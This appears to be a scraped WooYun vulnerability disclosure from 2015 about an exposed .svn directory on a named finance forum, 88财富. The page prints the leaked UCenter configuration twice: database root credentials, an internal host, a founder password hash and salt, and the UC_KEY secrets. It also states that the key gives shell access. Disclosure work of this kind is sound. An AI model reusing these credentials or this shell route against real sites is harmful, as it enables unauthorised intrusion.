88财富某站信息泄漏（可shell） | wooyun-2015-0141292| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141292

漏洞标题：88财富某站信息泄漏（可shell）

漏洞作者：残废

提交时间：2015-09-15 15:09

修复时间：2015-11-01 11:00

公开时间：2015-11-01 11:00

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-15：细节已通知厂商并且等待厂商处理中
2015-09-17：厂商已经确认，细节仅向厂商公开
2015-09-27：细节向核心白帽子及相关领域专家公开
2015-10-07：细节向普通白帽子公开
2015-10-17：细节向实习白帽子公开
2015-11-01：细节向公众公开

简要描述：

详细说明：

http://bbs.88.com.cn/uc_server/.svn/entries

<?php 
define('UC_DBHOST', '192.168.0.13:3306');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'zkc123456');
define('UC_DBNAME', 'cfbbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'pre_ucenter_');
define('UC_COOKIEPATH', '/');
define('UC_COOKIEDOMAIN', '');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_FOUNDERPW', '791af3d079a45027eeb659f7d0763a75');
define('UC_FOUNDERSALT', '18Q7fe');
define('UC_KEY', 'X8r7Zez1N7r2N418M9fd2689qar3T7lc86Ictdj3ce24z0w129X4Ofm2a5w81d5f');
define('UC_SITEID', 'v8i7FeE1B7H214V8i9VdT6X95af3k7xcC6YcEdM35eN4u0N1P9P4ufx275w8DdSf');
define('UC_MYKEY', 'G8l7qe91y7E284u8b9Ldz6l9zaA3Q7xck6Rc2d53ieR4r05169y4ffR2N5i8JdHf');
define('UC_DEBUG', false);
define('UC_PPP', 20);

得UC_key可shell

漏洞证明：

http://bbs.88.com.cn/uc_server/.svn/entries

<?php 
define('UC_DBHOST', '192.168.0.13:3306');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'zkc123456');
define('UC_DBNAME', 'cfbbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', 'pre_ucenter_');
define('UC_COOKIEPATH', '/');
define('UC_COOKIEDOMAIN', '');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_FOUNDERPW', '791af3d079a45027eeb659f7d0763a75');
define('UC_FOUNDERSALT', '18Q7fe');
define('UC_KEY', 'X8r7Zez1N7r2N418M9fd2689qar3T7lc86Ictdj3ce24z0w129X4Ofm2a5w81d5f');
define('UC_SITEID', 'v8i7FeE1B7H214V8i9VdT6X95af3k7xcC6YcEdM35eN4u0N1P9P4ufx275w8DdSf');
define('UC_MYKEY', 'G8l7qe91y7E284u8b9Ldz6l9zaA3Q7xck6Rc2d53ieR4r05169y4ffR2N5i8JdHf');
define('UC_DEBUG', false);
define('UC_PPP', 20);

得UC_key可shell

修复方案：

你懂得

版权声明：转载请注明来源残废@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2015-09-17 10:58

厂商回复：

已修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141292

漏洞标题：88财富某站信息泄漏（可shell）

相关厂商：88财富网

漏洞作者：残废

提交时间：2015-09-15 15:09

修复时间：2015-11-01 11:00

公开时间：2015-11-01 11:00

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源残废@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0141292

漏洞标题：88财富某站信息泄漏（可shell）

相关厂商：88财富网

漏洞作者： 残废

提交时间：2015-09-15 15:09

修复时间：2015-11-01 11:00

公开时间：2015-11-01 11:00

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0141292"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 残废@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：残废

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源残废@乌云